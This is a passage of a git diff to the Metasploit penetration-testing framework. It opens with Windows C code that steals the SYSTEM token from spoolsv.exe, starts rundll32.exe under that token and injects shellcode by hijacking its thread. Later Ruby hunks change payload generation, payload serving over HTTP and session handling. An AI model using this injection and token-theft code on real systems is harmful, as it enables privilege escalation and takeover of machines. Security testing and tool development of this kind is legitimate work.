/* and running as NT_AUTHORITY SYSTEM */
|
||||||
|
|
||||||
|
dwPid = FindProcessId("spoolsv.exe");
|
||||||
|
if (!dwPid) {
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
|
||||||
|
if (!hProcessHandle) {
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
bIsSystem = FALSE;
|
||||||
|
if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) {
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
/* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */
|
||||||
|
|
||||||
|
OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle);
|
||||||
|
CloseHandle(hProcessHandle);
|
||||||
|
return hTokenHandle;
|
||||||
|
}
|
||||||
|
|
||||||
|
DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) {
|
||||||
|
/* wait for the process to exit or 10 seconds before cleaning up */
|
||||||
|
WaitForSingleObject(pExploitData->hProcess, 10000);
|
||||||
|
CloseHandle(pExploitData->hProcess);
|
||||||
|
CloseHandle(pExploitData->hMutex);
|
||||||
|
|
||||||
|
/* this does not return */
|
||||||
|
FreeLibraryAndExitThread(pExploitData->hModule, 0);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
void ExecutePayload(HANDLE hDll) {
|
||||||
|
PROCESS_INFORMATION pi;
|
||||||
|
STARTUPINFO si;
|
||||||
|
CONTEXT ctx;
|
||||||
|
LPVOID ep;
|
||||||
|
SECURITY_ATTRIBUTES MutexAttributes;
|
||||||
|
SIZE_T dwBytesWritten = 0;
|
||||||
|
PEXPLOIT_DATA pExploitData = NULL;
|
||||||
|
HANDLE hToken;
|
||||||
|
|
||||||
|
pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA));
|
||||||
|
if (!pExploitData) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* keep a reference to the module for synchronization purposes */
|
||||||
|
GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule));
|
||||||
|
|
||||||
|
ZeroMemory(&MutexAttributes, sizeof(MutexAttributes));
|
||||||
|
MutexAttributes.nLength = sizeof(MutexAttributes);
|
||||||
|
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
|
||||||
|
pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!");
|
||||||
|
if (!pExploitData->hMutex) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (GetLastError() == ERROR_ALREADY_EXISTS) {
|
||||||
|
CloseHandle(pExploitData->hMutex);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (GetLastError() == ERROR_ACCESS_DENIED) {
|
||||||
|
CloseHandle(pExploitData->hMutex);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
hToken = GetPayloadToken();
|
||||||
|
|
||||||
|
ZeroMemory(&si, sizeof(si));
|
||||||
|
si.cb = sizeof(si);
|
||||||
|
|
||||||
|
/* start up the payload in a new process */
|
||||||
|
if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
|
||||||
|
ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
|
||||||
|
GetThreadContext(pi.hThread, &ctx);
|
||||||
|
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
|
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten);
|
||||||
|
if (dwBytesWritten == SCSIZE) {
|
||||||
|
|
||||||
|
#ifdef _WIN64
|
||||||
|
ctx.Rip = (DWORD64)ep;
|
||||||
|
#else
|
||||||
|
ctx.Eip = (DWORD)ep;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
SetThreadContext(pi.hThread, &ctx);
|
||||||
|
ResumeThread(pi.hThread);
|
||||||
|
|
||||||
|
CloseHandle(pi.hThread);
|
||||||
|
pExploitData->hProcess = pi.hProcess;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (hToken) {
|
||||||
|
CloseHandle(hToken);
|
||||||
|
}
|
||||||
|
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL);
|
||||||
|
}
|
|
@ -0,0 +1,3 @@
|
||||||
|
EXPORTS
|
||||||
|
DllMain@12
|
||||||
|
|
|
@ -0,0 +1,11 @@
|
||||||
|
#define SCSIZE 2048
|
||||||
|
unsigned char code[SCSIZE] = "PAYLOAD:";
|
||||||
|
|
||||||
|
typedef struct {
|
||||||
|
HANDLE hModule;
|
||||||
|
HANDLE hMutex;
|
||||||
|
HANDLE hProcess;
|
||||||
|
} EXPLOIT_DATA, *PEXPLOIT_DATA;
|
||||||
|
|
||||||
|
#define SIDSTR_SYSTEM _T("s-1-5-18")
|
||||||
|
#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult)
|
|
@ -0,0 +1,18 @@
|
||||||
|
|
||||||
|
LANGUAGE 9, 1
|
||||||
|
|
||||||
|
|
||||||
|
VS_VERSION_INFO VERSIONINFO
|
||||||
|
FILEVERSION 0,0,0,1
|
||||||
|
PRODUCTVERSION 0,0,0,1
|
||||||
|
FILEFLAGSMASK 0x17L
|
||||||
|
FILEFLAGS 0x0L
|
||||||
|
FILEOS 0x4L
|
||||||
|
FILETYPE 0x2L
|
||||||
|
FILESUBTYPE 0x0L
|
||||||
|
BEGIN
|
||||||
|
|
||||||
|
END
|
||||||
|
|
||||||
|
#define RT_HTML 23
|
||||||
|
|
|
@ -634,8 +634,8 @@ module Metasploit
|
||||||
if idx > 0
|
if idx > 0
|
||||||
encryption_mode = resp[idx, 1].unpack("C")[0]
|
encryption_mode = resp[idx, 1].unpack("C")[0]
|
||||||
else
|
else
|
||||||
raise RunTimeError, "Unable to parse encryption req. "\
|
framework_module.print_error("Unable to parse encryption req " \
|
||||||
"from server during prelogin"
|
"during pre-login, this may not be a MSSQL server")
|
||||||
encryption_mode = ENCRYPT_NOT_SUP
|
encryption_mode = ENCRYPT_NOT_SUP
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -682,8 +682,9 @@ module Metasploit
|
||||||
if idx > 0
|
if idx > 0
|
||||||
encryption_mode = resp[idx, 1].unpack("C")[0]
|
encryption_mode = resp[idx, 1].unpack("C")[0]
|
||||||
else
|
else
|
||||||
raise RuntimeError, "Unable to parse encryption "\
|
framework_module.print_error("Unable to parse encryption req " \
|
||||||
"req during pre-login"
|
"during pre-login, this may not be a MSSQL server")
|
||||||
|
encryption_mode = ENCRYPT_NOT_SUP
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
encryption_mode
|
encryption_mode
|
||||||
|
|
|
@ -30,7 +30,7 @@ module Metasploit
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
VERSION = "4.16.8"
|
VERSION = "4.16.18"
|
||||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||||
PRERELEASE = 'dev'
|
PRERELEASE = 'dev'
|
||||||
HASH = get_hash
|
HASH = get_hash
|
||||||
|
|
|
@ -165,6 +165,7 @@ class ReadableText
|
||||||
output << " Name: #{mod.name}\n"
|
output << " Name: #{mod.name}\n"
|
||||||
output << " Module: #{mod.fullname}\n"
|
output << " Module: #{mod.fullname}\n"
|
||||||
output << " Platform: #{mod.platform_to_s}\n"
|
output << " Platform: #{mod.platform_to_s}\n"
|
||||||
|
output << " Arch: #{mod.arch_to_s}\n"
|
||||||
output << " Privileged: " + (mod.privileged? ? "Yes" : "No") + "\n"
|
output << " Privileged: " + (mod.privileged? ? "Yes" : "No") + "\n"
|
||||||
output << " License: #{mod.license}\n"
|
output << " License: #{mod.license}\n"
|
||||||
output << " Rank: #{mod.rank_to_s.capitalize}\n"
|
output << " Rank: #{mod.rank_to_s.capitalize}\n"
|
||||||
|
@ -275,11 +276,20 @@ class ReadableText
|
||||||
|
|
||||||
# Authors
|
# Authors
|
||||||
output << "Provided by:\n"
|
output << "Provided by:\n"
|
||||||
mod.each_author { |author|
|
mod.each_author.each do |author|
|
||||||
output << indent + author.to_s + "\n"
|
output << indent + author.to_s + "\n"
|
||||||
}
|
end
|
||||||
output << "\n"
|
output << "\n"
|
||||||
|
|
||||||
|
# Compatible session types
|
||||||
|
if mod.session_types
|
||||||
|
output << "Compatible session types:\n"
|
||||||
|
mod.session_types.sort.each do |type|
|
||||||
|
output << indent + type.capitalize + "\n"
|
||||||
|
end
|
||||||
|
output << "\n"
|
||||||
|
end
|
||||||
|
|
||||||
# Actions
|
# Actions
|
||||||
if mod.action
|
if mod.action
|
||||||
output << "Available actions:\n"
|
output << "Available actions:\n"
|
||||||
|
@ -539,6 +549,7 @@ class ReadableText
|
||||||
|
|
||||||
columns = []
|
columns = []
|
||||||
columns << 'Id'
|
columns << 'Id'
|
||||||
|
columns << 'Name'
|
||||||
columns << 'Type'
|
columns << 'Type'
|
||||||
columns << 'Checkin?' if show_extended
|
columns << 'Checkin?' if show_extended
|
||||||
columns << 'Enc?' if show_extended
|
columns << 'Enc?' if show_extended
|
||||||
|
@ -562,6 +573,7 @@ class ReadableText
|
||||||
|
|
||||||
row = []
|
row = []
|
||||||
row << session.sid.to_s
|
row << session.sid.to_s
|
||||||
|
row << session.sname.to_s
|
||||||
row << session.type.to_s
|
row << session.type.to_s
|
||||||
if session.respond_to?(:session_type)
|
if session.respond_to?(:session_type)
|
||||||
row[-1] << (" " + session.session_type)
|
row[-1] << (" " + session.session_type)
|
||||||
|
@ -617,6 +629,7 @@ class ReadableText
|
||||||
|
|
||||||
sess_info = session.info.to_s
|
sess_info = session.info.to_s
|
||||||
sess_id = session.sid.to_s
|
sess_id = session.sid.to_s
|
||||||
|
sess_name = session.sname.to_s
|
||||||
sess_tunnel = session.tunnel_to_s + " (#{session.session_host})"
|
sess_tunnel = session.tunnel_to_s + " (#{session.session_host})"
|
||||||
sess_via = session.via_exploit.to_s
|
sess_via = session.via_exploit.to_s
|
||||||
sess_type = session.type.to_s
|
sess_type = session.type.to_s
|
||||||
|
@ -647,6 +660,7 @@ class ReadableText
|
||||||
end
|
end
|
||||||
|
|
||||||
out << " Session ID: #{sess_id}\n"
|
out << " Session ID: #{sess_id}\n"
|
||||||
|
out << " Name: #{sess_name}\n"
|
||||||
out << " Type: #{sess_type}\n"
|
out << " Type: #{sess_type}\n"
|
||||||
out << " Info: #{sess_info}\n"
|
out << " Info: #{sess_info}\n"
|
||||||
out << " Tunnel: #{sess_tunnel}\n"
|
out << " Tunnel: #{sess_tunnel}\n"
|
||||||
|
|
|
@ -147,9 +147,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client
|
||||||
guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*')
|
guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*')
|
||||||
session.core.set_session_guid(guid)
|
session.core.set_session_guid(guid)
|
||||||
session.session_guid = guid
|
session.session_guid = guid
|
||||||
# TODO: New statgeless session, do some account in the DB so we can track it later.
|
# TODO: New stageless session, do some account in the DB so we can track it later.
|
||||||
else
|
else
|
||||||
# TODO: This session was either staged or previously known, and so we shold do some accounting here!
|
# TODO: This session was either staged or previously known, and so we should do some accounting here!
|
||||||
end
|
end
|
||||||
|
|
||||||
unless datastore['AutoLoadStdapi'] == false
|
unless datastore['AutoLoadStdapi'] == false
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
require 'msf/base/sessions/meterpreter'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
module Sessions
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# This class creates a platform-specific meterpreter session type
|
||||||
|
#
|
||||||
|
###
|
||||||
|
class Meterpreter_ppce500v2_Linux < Msf::Sessions::Meterpreter
|
||||||
|
def supports_ssl?
|
||||||
|
false
|
||||||
|
end
|
||||||
|
def supports_zlib?
|
||||||
|
false
|
||||||
|
end
|
||||||
|
def initialize(rstream, opts={})
|
||||||
|
super
|
||||||
|
self.base_platform = 'linux'
|
||||||
|
self.base_arch = ARCH_PPCE500V2
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -27,7 +27,7 @@ module Scriptable
|
||||||
|
|
||||||
# Scan all of the path combinations
|
# Scan all of the path combinations
|
||||||
check_paths.each { |path|
|
check_paths.each { |path|
|
||||||
if ::File.exist?(path)
|
if ::File.file?(path)
|
||||||
full_path = path
|
full_path = path
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
|
@ -150,7 +150,7 @@ module Scriptable
|
||||||
# session
|
# session
|
||||||
local_exploit_opts = local_exploit_opts.merge(opts)
|
local_exploit_opts = local_exploit_opts.merge(opts)
|
||||||
|
|
||||||
new_session = mod.exploit_simple(
|
mod.exploit_simple(
|
||||||
'Payload' => local_exploit_opts.delete('payload'),
|
'Payload' => local_exploit_opts.delete('payload'),
|
||||||
'Target' => local_exploit_opts.delete('target'),
|
'Target' => local_exploit_opts.delete('target'),
|
||||||
'LocalInput' => self.user_input,
|
'LocalInput' => self.user_input,
|
||||||
|
|
|
@ -17,6 +17,7 @@ class Msf::Author
|
||||||
KNOWN = {
|
KNOWN = {
|
||||||
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
|
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
|
||||||
'anonymous' => 'Unknown',
|
'anonymous' => 'Unknown',
|
||||||
|
'aushack' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
|
||||||
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
|
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
|
||||||
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
|
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
|
||||||
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
|
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
|
||||||
|
@ -39,7 +40,6 @@ class Msf::Author
|
||||||
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
|
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
|
||||||
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
|
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
|
||||||
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
|
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
|
||||||
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
|
|
||||||
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
|
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
|
||||||
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
|
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
|
||||||
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
|
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
|
||||||
|
|
|
@ -547,17 +547,17 @@ module Auxiliary::AuthBrute
|
||||||
end
|
end
|
||||||
|
|
||||||
def vprint_status(msg='')
|
def vprint_status(msg='')
|
||||||
print_brute :level => :vstatus
|
print_brute :level => :vstatus, :msg => msg
|
||||||
end
|
end
|
||||||
|
|
||||||
def vprint_error(msg='')
|
def vprint_error(msg='')
|
||||||
print_brute :level => :verror
|
print_brute :level => :verror, :msg => msg
|
||||||
end
|
end
|
||||||
|
|
||||||
alias_method :vprint_bad, :vprint_error
|
alias_method :vprint_bad, :vprint_error
|
||||||
|
|
||||||
def vprint_good(msg='')
|
def vprint_good(msg='')
|
||||||
print_brute :level => :vgood
|
print_brute :level => :vgood, :msg => msg
|
||||||
end
|
end
|
||||||
|
|
||||||
# Provides a consistant way to display messages about AuthBrute-mixed modules.
|
# Provides a consistant way to display messages about AuthBrute-mixed modules.
|
||||||
|
|
|
@ -43,7 +43,7 @@ def rport
|
||||||
end
|
end
|
||||||
|
|
||||||
def set_nmap_cmd
|
def set_nmap_cmd
|
||||||
self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary")
|
self.nmap_bin || (raise "Cannot locate nmap binary")
|
||||||
nmap_set_log
|
nmap_set_log
|
||||||
nmap_add_ports
|
nmap_add_ports
|
||||||
nmap_cmd = [self.nmap_bin]
|
nmap_cmd = [self.nmap_bin]
|
||||||
|
@ -54,7 +54,7 @@ def set_nmap_cmd
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_nmap_ver
|
def get_nmap_ver
|
||||||
self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary")
|
self.nmap_bin || (raise "Cannot locate nmap binary")
|
||||||
res = ""
|
res = ""
|
||||||
nmap_cmd = [self.nmap_bin]
|
nmap_cmd = [self.nmap_bin]
|
||||||
nmap_cmd << "--version"
|
nmap_cmd << "--version"
|
||||||
|
@ -84,7 +84,7 @@ def nmap_version_at_least?(test_ver=nil)
|
||||||
end
|
end
|
||||||
|
|
||||||
def nmap_build_args
|
def nmap_build_args
|
||||||
raise RuntimeError, "nmap_build_args() not defined by #{self.refname}"
|
raise "nmap_build_args() not defined by #{self.refname}"
|
||||||
end
|
end
|
||||||
|
|
||||||
def nmap_run
|
def nmap_run
|
||||||
|
@ -159,13 +159,13 @@ end
|
||||||
# A helper to add in rport or rports as a -p argument
|
# A helper to add in rport or rports as a -p argument
|
||||||
def nmap_add_ports
|
def nmap_add_ports
|
||||||
if not nmap_validate_rports
|
if not nmap_validate_rports
|
||||||
raise RuntimeError, "Cannot continue without a valid port list."
|
raise "Cannot continue without a valid port list."
|
||||||
end
|
end
|
||||||
port_arg = "-p \"#{datastore['RPORT'] || rports}\""
|
port_arg = "-p \"#{datastore['RPORT'] || rports}\""
|
||||||
if nmap_validate_arg(port_arg)
|
if nmap_validate_arg(port_arg)
|
||||||
self.nmap_args << port_arg
|
self.nmap_args << port_arg
|
||||||
else
|
else
|
||||||
raise RunTimeError, "Argument is invalid"
|
raise "Argument is invalid"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -237,7 +237,7 @@ end
|
||||||
# module to ferret out whatever's interesting in this host
|
# module to ferret out whatever's interesting in this host
|
||||||
# object.
|
# object.
|
||||||
def nmap_hosts(&block)
|
def nmap_hosts(&block)
|
||||||
@nmap_bin || (raise RuntimeError, "Cannot locate the nmap binary.")
|
@nmap_bin || (raise "Cannot locate the nmap binary.")
|
||||||
fh = self.nmap_log[0]
|
fh = self.nmap_log[0]
|
||||||
nmap_data = fh.read(fh.stat.size)
|
nmap_data = fh.read(fh.stat.size)
|
||||||
# fh.unlink
|
# fh.unlink
|
||||||
|
|
|
@ -44,7 +44,7 @@ module Msf::DBManager::Report
|
||||||
|
|
||||||
unless artifact.valid?
|
unless artifact.valid?
|
||||||
errors = artifact.errors.full_messages.join('; ')
|
errors = artifact.errors.full_messages.join('; ')
|
||||||
raise RuntimeError "Artifact to be imported is not valid: #{errors}"
|
raise "Artifact to be imported is not valid: #{errors}"
|
||||||
end
|
end
|
||||||
artifact.save
|
artifact.save
|
||||||
end
|
end
|
||||||
|
@ -66,7 +66,7 @@ module Msf::DBManager::Report
|
||||||
|
|
||||||
unless report.valid?
|
unless report.valid?
|
||||||
errors = report.errors.full_messages.join('; ')
|
errors = report.errors.full_messages.join('; ')
|
||||||
raise RuntimeError "Report to be imported is not valid: #{errors}"
|
raise "Report to be imported is not valid: #{errors}"
|
||||||
end
|
end
|
||||||
report.state = :complete # Presume complete since it was exported
|
report.state = :complete # Presume complete since it was exported
|
||||||
report.save
|
report.save
|
||||||
|
@ -83,4 +83,4 @@ module Msf::DBManager::Report
|
||||||
wspace.reports
|
wspace.reports
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -27,9 +27,25 @@ module Http
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
if request['User-Agent'] =~ /^(?:Wget|curl)/
|
client = cli.peerhost
|
||||||
|
|
||||||
|
if (user_agent = request.headers['User-Agent'])
|
||||||
|
client << " (#{user_agent})"
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Client #{client} requested #{request.raw_uri}")
|
||||||
|
|
||||||
|
if stager_instance.respond_to?(:user_agent)
|
||||||
|
agent_regex = stager_instance.user_agent
|
||||||
|
else
|
||||||
|
agent_regex = /.*/
|
||||||
|
end
|
||||||
|
|
||||||
|
if user_agent =~ agent_regex
|
||||||
|
print_status("Sending payload to #{client}")
|
||||||
send_response(cli, exe)
|
send_response(cli, exe)
|
||||||
else
|
else
|
||||||
|
print_status("Sending 404 to #{client}")
|
||||||
send_not_found(cli)
|
send_not_found(cli)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -138,6 +138,28 @@ module Exploit::EXE
|
||||||
dll
|
dll
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def generate_payload_dccw_gdiplus_dll(opts = {})
|
||||||
|
return get_custom_exe unless datastore['EXE::Custom'].to_s.strip.empty?
|
||||||
|
return get_eicar_exe if datastore['EXE::EICAR']
|
||||||
|
|
||||||
|
exe_init_options(opts)
|
||||||
|
plat = opts[:platform]
|
||||||
|
pl = opts[:code]
|
||||||
|
|
||||||
|
pl ||= payload.encoded
|
||||||
|
|
||||||
|
#Ensure opts[:arch] is an array
|
||||||
|
opts[:arch] = [opts[:arch]] unless opts[:arch].kind_of? Array
|
||||||
|
if opts[:arch] && opts[:arch].index(ARCH_X64)
|
||||||
|
dll = Msf::Util::EXE.to_win64pe_dccw_gdiplus_dll(framework, pl, opts)
|
||||||
|
else
|
||||||
|
dll = Msf::Util::EXE.to_win32pe_dccw_gdiplus_dll(framework, pl, opts)
|
||||||
|
end
|
||||||
|
|
||||||
|
exe_post_generation(opts)
|
||||||
|
dll
|
||||||
|
end
|
||||||
|
|
||||||
def generate_payload_msi(opts = {})
|
def generate_payload_msi(opts = {})
|
||||||
return get_custom_exe(datastore['MSI::Custom']) unless datastore['MSI::Custom'].to_s.strip.empty?
|
return get_custom_exe(datastore['MSI::Custom']) unless datastore['MSI::Custom'].to_s.strip.empty?
|
||||||
return get_eicar_exe if datastore['MSI::EICAR']
|
return get_eicar_exe if datastore['MSI::EICAR']
|
||||||
|
|
|
@ -96,8 +96,14 @@ module Exploit::Remote::Ftp
|
||||||
# This method handles disconnecting our data channel
|
# This method handles disconnecting our data channel
|
||||||
#
|
#
|
||||||
def data_disconnect
|
def data_disconnect
|
||||||
self.datasocket.shutdown if self.datasocket
|
begin
|
||||||
self.datasocket = nil
|
if datasocket
|
||||||
|
datasocket.shutdown
|
||||||
|
datasocket.close
|
||||||
|
end
|
||||||
|
rescue IOError
|
||||||
|
end
|
||||||
|
datasocket = nil if datasocket
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -213,7 +219,7 @@ module Exploit::Remote::Ftp
|
||||||
if (type == "get")
|
if (type == "get")
|
||||||
# failed listings just disconnect..
|
# failed listings just disconnect..
|
||||||
begin
|
begin
|
||||||
data = self.datasocket.get_once(-1, ftp_timeout)
|
data = datasocket.get(ftp_timeout, ftp_data_timeout)
|
||||||
rescue ::EOFError
|
rescue ::EOFError
|
||||||
data = nil
|
data = nil
|
||||||
end
|
end
|
||||||
|
@ -335,6 +341,13 @@ module Exploit::Remote::Ftp
|
||||||
(datastore['FTPTimeout'] || 10).to_i
|
(datastore['FTPTimeout'] || 10).to_i
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Returns the number of seconds to wait to get more FTP data
|
||||||
|
#
|
||||||
|
def ftp_data_timeout
|
||||||
|
(datastore['FTPDataTimeout'] || 1).to_i
|
||||||
|
end
|
||||||
|
|
||||||
protected
|
protected
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
|
@ -334,7 +334,7 @@ module Exploit::Remote::HttpClient
|
||||||
# Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
|
# Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
|
||||||
#
|
#
|
||||||
# @return (see Rex::Proto::Http::Client#send_recv))
|
# @return (see Rex::Proto::Http::Client#send_recv))
|
||||||
def send_request_cgi(opts={}, timeout = 20)
|
def send_request_cgi(opts={}, timeout = 20, disconnect = true)
|
||||||
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
|
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
|
||||||
actual_timeout = datastore['HttpClientTimeout']
|
actual_timeout = datastore['HttpClientTimeout']
|
||||||
else
|
else
|
||||||
|
@ -362,7 +362,7 @@ module Exploit::Remote::HttpClient
|
||||||
print_line('#' * 20)
|
print_line('#' * 20)
|
||||||
print_line(res.to_terminal_output)
|
print_line(res.to_terminal_output)
|
||||||
end
|
end
|
||||||
disconnect(c)
|
disconnect(c) if disconnect
|
||||||
res
|
res
|
||||||
rescue ::Errno::EPIPE, ::Timeout::Error => e
|
rescue ::Errno::EPIPE, ::Timeout::Error => e
|
||||||
print_line(e.message) if datastore['HttpTrace']
|
print_line(e.message) if datastore['HttpTrace']
|
||||||
|
|
|
@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
||||||
# @param pass [String] Password
|
# @param pass [String] Password
|
||||||
# @param redirect URL [String] to redirect after successful login
|
# @param redirect URL [String] to redirect after successful login
|
||||||
# @return [Hash] The post data for vars_post Parameter
|
# @return [Hash] The post data for vars_post Parameter
|
||||||
def wordpress_helper_login_post_data(user, pass, redirect=nil)
|
def wordpress_helper_login_post_data(user, pass, redirect = nil)
|
||||||
post_data = {
|
post_data = {
|
||||||
'log' => user.to_s,
|
'log' => user.to_s,
|
||||||
'pwd' => pass.to_s,
|
'pwd' => pass.to_s,
|
||||||
'redirect_to' => redirect.to_s,
|
'redirect_to' => redirect.to_s,
|
||||||
'wp-submit' => 'Login'
|
'wp-submit' => 'Login'
|
||||||
}
|
}
|
||||||
post_data
|
post_data
|
||||||
end
|
end
|
||||||
|
@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
||||||
# @return [String,nil] The location of the new comment/post, nil on error
|
# @return [String,nil] The location of the new comment/post, nil on error
|
||||||
def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url)
|
def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url)
|
||||||
vars_post = {
|
vars_post = {
|
||||||
'comment' => comment,
|
'comment' => comment,
|
||||||
'submit' => 'Post+Comment',
|
'submit' => 'Post+Comment',
|
||||||
'comment_post_ID' => comment_post_id.to_s,
|
'comment_post_ID' => comment_post_id.to_s,
|
||||||
'comment_parent' => '0'
|
'comment_parent' => '0'
|
||||||
}
|
}
|
||||||
vars_post.merge!({
|
vars_post.merge!({
|
||||||
'author' => author,
|
'author' => author,
|
||||||
'email' => email,
|
'email' => email,
|
||||||
'url' => url,
|
'url' => url
|
||||||
}) unless login_cookie
|
}) unless login_cookie
|
||||||
|
|
||||||
options = {
|
options = {
|
||||||
'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
|
'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
|
||||||
'method' => 'POST'
|
'method' => 'POST'
|
||||||
}
|
}
|
||||||
options.merge!({'vars_post' => vars_post})
|
options.merge!({ 'vars_post' => vars_post })
|
||||||
options.merge!({'cookie' => login_cookie}) if login_cookie
|
options.merge!({ 'cookie' => login_cookie }) if login_cookie
|
||||||
res = send_request_cgi(options)
|
res = send_request_cgi(options)
|
||||||
if res && res.redirect? && res.redirection
|
if res && res.redirect? && res.redirection
|
||||||
return wordpress_helper_parse_location_header(res)
|
return wordpress_helper_parse_location_header(res)
|
||||||
|
@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
||||||
# @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found
|
# @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found
|
||||||
# @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user
|
# @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user
|
||||||
# @return [Integer,nil] The post id, nil when nothing found
|
# @return [Integer,nil] The post id, nil when nothing found
|
||||||
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil)
|
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil)
|
||||||
range.each { |id|
|
range.each { |id|
|
||||||
vprint_status("Checking POST ID #{id}...") if (id % 100) == 0
|
vprint_status("Checking POST ID #{id}...") if (id % 100) == 0
|
||||||
body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
|
body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
|
||||||
|
